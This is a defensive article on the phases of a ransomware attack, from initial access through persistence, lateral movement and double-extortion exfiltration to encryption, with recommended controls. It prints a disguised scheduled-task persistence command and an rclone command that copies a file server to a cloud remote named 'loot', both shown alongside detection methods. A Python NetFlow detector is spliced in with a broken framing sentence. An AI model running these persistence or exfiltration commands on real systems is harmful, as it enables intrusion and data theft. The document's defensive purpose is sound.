Ransomware has evolved from a nuisance that encrypted files on individual machines into a sophisticated criminal enterprise that follows a defined operational playbook. Ransomware-as-a-Service (RaaS) groups now operate with specialised teams: initial access brokers who sell footholds, pen testers who perform network compromise, and separate teams for data exfiltration and ransom negotiation. Understanding this structure tells you which controls disrupt the operation at each phase.
Phase 1: Initial Access
Initial access is almost always obtained via one of three routes: phishing emails delivering credential stealers or remote access trojans (accounting for around 40% of ransomware intrusions), exploitation of externally exposed services (VPN appliances, RDP, Exchange vulnerabilities), or initial access brokers selling pre-established footholds acquired via prior stealer malware infections.
| Access Method | Frequency | Top Defensive Control |
|---|---|---|
| Phishing | ~40% | Email filtering + phishing-resistant MFA |
| Exposed RDP/VPN | ~30% | Patch cadence + conditional access |
| IAB purchase | ~20% | Credential monitoring + EDR |
| Supply chain | ~10% | Software composition analysis + vendor MFA |
Phase 2: Post-Exploitation and Persistence
After gaining initial access, operators establish persistence and begin internal reconnaissance. Common persistence mechanisms include scheduled tasks, registry run keys, and WMI event subscriptions on Windows; cron jobs and modified boot scripts on Linux. The goal is to survive reboots and initial EDR detections.
```powershell
# Common persistence mechanism: scheduled task (highly detectable if EDR is configured)
schtasks /create /tn "WindowsUpdate" /tr "C:\ProgramData\update.exe" /sc onlogon /ru system /f

# Less common but harder to detect: WMI event subscription.
# A subscription consists of an __EventFilter (the trigger query), an __EventConsumer
# (the action) and a __FilterToConsumerBinding that links the two; only the names and
# the trigger query are shown here.
$FilterName = "WindowsUpdateFilter"
$ConsumerName = "WindowsUpdateConsumer"
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 3"

# Detection: enumerate WMI subscriptions (filters, consumers and the bindings between them)
Get-WmiObject -Namespace root/subscription -Class __EventFilter
Get-WmiObject -Namespace root/subscription -Class __EventConsumer
Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
```
Phase 3: Lateral Movement and Domain Compromise
Modern ransomware groups do not immediately encrypt. They spend time — often days or weeks — establishing domain-level access to maximise the blast radius of the final encryption event. Techniques mirror those used by nation-state actors: Kerberoasting, DCSync, Pass-the-Hash, and living-off-the-land with legitimate administrative tools (PsExec, WMI, PowerShell remoting).
Phase 4: Data Exfiltration (Double Extortion)
Since approximately 2020, most sophisticated ransomware groups exfiltrate data before encrypting it. This 'double extortion' tactic means that even organisations with working backups face the threat of data publication if they do not pay. Exfiltration typically uses legitimate cloud storage services (Mega, Rclone with cloud backends, Storj DCS) to blend with normal traffic.
```bash
# Attacker-side exfil using Rclone (blend with legitimate cloud sync traffic)
# This is documented for detection purposes
rclone copy /mnt/fileserver remote:loot --transfers 10 --ignore-errors

# Detection: monitor for Rclone or unusual outbound data volumes
# Windows Event Log - network connections from rclone.exe
# DLP rules: bulk access to file shares followed by outbound data transfer
# NetFlow analysis: sustained high-volume transfers to cloud storage endpoints
```
Phase 5: Encryption and Ransom Demand
The encryption event is typically triggered on a schedule or by remote command after all preparation is complete. Modern encryptors use hybrid encryption (asymmetric for key transport, symmetric for bulk data), target network shares and backup infrastructure, and attempt to delete Volume Shadow Copies to prevent easy recovery.
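The DLP and NetFlow checks listed under Phase 4 (bulk file-share access followed by sustained outbound transfer to cloud storage) as an added, runnable example; this is not code from the original article. The flow records, the cloud-storage watchlist, the file-server address and the byte thresholds are all constructed for illustration.

```python
from datetime import datetime, timedelta

GB = 1_000_000_000
# Assumed watchlist of cloud storage endpoints and internal file servers; a real deployment
# would load these from proxy categories / CMDB rather than hard-coding them.
CLOUD_STORAGE = {"mega.nz", "storj.io", "drive.google.com", "s3.amazonaws.com"}
FILE_SERVERS = {"10.0.1.10"}
SMB_PORT = 445

# Constructed sample flow records (timestamp, src, dst, dst_port, bytes); not real traffic.
FLOWS = [
    ("2024-05-01T02:10:00", "10.0.5.23", "10.0.1.10", 445, 48 * GB),      # bulk read of a share
    ("2024-05-01T02:40:00", "10.0.5.23", "mega.nz", 443, 22 * GB),        # then pushed to cloud storage
    ("2024-05-01T03:05:00", "10.0.5.23", "mega.nz", 443, 25 * GB),
    ("2024-05-01T09:00:00", "10.0.7.41", "drive.google.com", 443, 300_000_000),  # routine sync
    ("2024-05-01T09:30:00", "10.0.7.41", "10.0.1.10", 445, 2 * GB),       # normal share use
]

def detect_exfil(flows, window=timedelta(hours=6), min_cloud_bytes=10 * GB, min_share_bytes=5 * GB):
    """Flag hosts that push more than min_cloud_bytes to cloud storage within one window.
    Severity is raised to high when a bulk SMB read from a file server precedes the upload,
    which is the staging-then-exfiltration pattern the DLP rule in Phase 4 describes."""
    parsed = sorted((datetime.fromisoformat(t), s, d, p, b) for t, s, d, p, b in flows)
    alerts = []
    for host in sorted({f[1] for f in parsed}):
        host_flows = [f for f in parsed if f[1] == host]
        cloud = [f for f in host_flows if f[2] in CLOUD_STORAGE]
        for i, first in enumerate(cloud):
            in_window = [f for f in cloud[i:] if f[0] - first[0] <= window]
            total = sum(f[4] for f in in_window)
            if total < min_cloud_bytes:
                continue
            # Bytes read from file servers over SMB in the window leading up to the first upload.
            share_read = sum(f[4] for f in host_flows
                             if f[2] in FILE_SERVERS and f[3] == SMB_PORT
                             and first[0] - window <= f[0] <= first[0])
            alerts.append({
                "host": host,
                "cloud_bytes": total,
                "destinations": sorted({f[2] for f in in_window}),
                "preceding_share_bytes": share_read,
                "severity": "high" if share_read >= min_share_bytes else "medium",
            })
            break  # one alert per host is enough; later windows would only repeat it
    return alerts

if __name__ == "__main__":
    for alert in detect_exfil(FLOWS):
        print(alert)
```

Thresholds need tuning per environment; a backup agent or a legitimate cloud migration will trip the same logic, so allow-list those sources rather than raising the byte threshold.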
Where to Invest Defensively
- Phishing-resistant MFA is the single highest-return investment. It blocks the most common initial access route.
- Patch externally exposed services within 72 hours of critical vulnerability disclosure. This is where initial access brokers find their inventory.
- EDR on every endpoint with memory protection enabled. The period between initial access and lateral movement is where most detection happens.
- Network segmentation between user workstations and servers. Lateral movement requires traversal of this boundary.
- Offline, immutable backups for all critical data. Test restores quarterly. The encryptor cannot reach what it cannot touch.
- Credential monitoring: subscribe to haveibeenpwned Enterprise or similar to know when your credentials appear in stealer logs before the threat actor uses them.